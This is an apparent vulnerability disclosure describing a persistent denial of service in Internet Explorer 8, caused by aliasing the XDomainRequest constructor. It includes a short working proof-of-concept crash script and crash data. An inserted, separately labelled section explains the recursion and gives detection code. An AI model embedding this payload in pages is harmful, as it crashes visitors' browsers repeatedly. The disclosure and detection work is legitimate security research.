Internet Explorer 8 XDR Persistent DOS.


*UPDATE* I placed the wrong PoC; I had several test cases, and the one below should work.

Abstract.

Internet Explorer 8 is vulnerable to prototype hijacking, or rather function aliasing, on the XDR object. The XDomainRequest object is a new feature in Internet Explorer that allows cross-domain XML calls. By default the feature only allows a cross-domain call when both parties agree on the request: the host to which the request was made has to append XDomainRequestAllowed to its response headers. Since this is a very dangerous object, I went on to explore the new feature in order to review its security a little more. It didn't take long to find a serious issue regarding prototype hijacking on the XDomainRequest object which leads to a denial of service that can only be recovered from after a full OS reboot. The reason it is persistent is the feature in Internet Explorer that tries to re-create a session window when a window crashes. This happens automatically, without user interaction, and therefore the denial of service persists.

The problem.

It is similar to the prototype hijacking first described by Stefano Di Paola for XMLHttpRequest back in 2006 [1], with the difference that it triggers a denial of service instead of a hijacked request. I create a function that instantiates a new XDR object every time the 'xdr' variable is called, which I think leads to function aliasing. Internet Explorer chokes on it and crashes the window we are working in. Then Internet Explorer tries to re-open the window, see figure 1.

Figure 1.

As seen in figure 2, trying to shut down iexplore.exe in the Windows Task Manager results in a new browser being launched that re-creates the window session. After killing that one, Internet Explorer instantiates a new browser and hangs again, and so on.

Figure 2.


It almost behaves like a Trojan which cannot be killed :)

The attack vector.

<script>
// trying prototype hijacking here:
// keep a reference to the host object, then overwrite the global name
// with a function that constructs through that same (now overwritten) name.
xdr = XDomainRequest;
XDomainRequest = function() {
    return new XDomainRequest();
}

// any use of the hijacked constructor triggers the crash.
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
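The wrapper above is what makes this function aliasing rather than a hijack: after the assignment the global name XDomainRequest refers to the wrapper itself, so its body re-enters itself on every call. The following is an added example, not code from the original post, showing (a) why such a self-referencing wrapper cannot terminate and (b) how a page can detect that one of its global constructors has been replaced by script that ran earlier: capture a reference to the constructor before any third-party script runs, and later compare the global against that saved reference and against a saved copy of Function.prototype.toString. It runs under Node, where XDomainRequest does not exist, so globalThis.Map stands in for the hijacked host constructor (assumption); the check itself is generic and works for any global constructor name.

```javascript
// Added example (not from the original post). `globalThis.Map` stands in for
// the browser's XDomainRequest / XMLHttpRequest constructor (assumption).

// Saved before any untrusted script can overwrite it; a hijacker that also
// replaces Function.prototype.toString would otherwise fool isNativeFunction.
const nativeToString = Function.prototype.toString;

// Capture a reference to a global constructor as early as possible (in a
// page: in the first script that runs). Later checks compare against this
// saved reference, never against the global name, because the global name
// is exactly what the hijacker overwrites.
function captureGlobal(name) {
  const original = globalThis[name];
  if (typeof original !== 'function') {
    throw new TypeError(`${name} is not a global function`);
  }
  return { name, original };
}

// A built-in constructor stringifies to "function Map() { [native code] }";
// a script-defined replacement shows its own source text instead.
function isNativeFunction(fn) {
  return typeof fn === 'function' &&
    /\[native code\]/.test(nativeToString.call(fn));
}

// Report whether the global currently bound to the captured name is still
// the original object and still a native function.
function checkGlobal(captured) {
  const current = globalThis[captured.name];
  return {
    replaced: current !== captured.original,
    native: isNativeFunction(current),
  };
}

// (a) The PoC's wrapper constructs through the global *name* it has just
// overwritten, so every call re-enters the wrapper. Node reports this as a
// RangeError (call stack exhausted) instead of crashing the process.
function selfAliasingFails() {
  const cap = captureGlobal('Map');
  globalThis.Map = function () { return new globalThis.Map(); };
  let failed = false;
  try {
    new globalThis.Map();
  } catch (e) {
    failed = e instanceof RangeError;
  }
  globalThis.Map = cap.original;   // restore for the rest of the process
  return failed;
}

// (b) Detection: capture, then simulate a replacement of the constructor.
function demo() {
  const cap = captureGlobal('Map');
  const before = checkGlobal(cap);            // { replaced: false, native: true }

  const saved = globalThis.Map;
  globalThis.Map = function () { return new saved(); };   // script-defined wrapper
  const after = checkGlobal(cap);             // { replaced: true, native: false }

  globalThis.Map = cap.original;              // restore
  return { before, after };
}

console.log(JSON.stringify(demo()), 'self-aliasing recursion failed:', selfAliasingFails());
```

The reference comparison is the reliable part of the check; the `[native code]` test is only a secondary signal, since bound functions also stringify as native and a hijacker who runs first can replace `Function.prototype.toString` as well. Both checks only help if the capturing script really is the first to execute on the page.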

Crash data:


AppName: iexplore.exe AppVer: 8.0.6001.17184 ModName: ieframe.dll
ModVer: 8.0.6001.17184 Offset: 0003f8cb

Conclusion.

More research is needed on this XDR object to fully grasp the risk of this new feature. The attack and PoC described here were performed with browserfry [2], and results may vary.

References:

[1] Subverting Ajax - http://www.wisec.it/docs.php?id=4 (PDF file)
[2] http://browserfry.0x000000.com
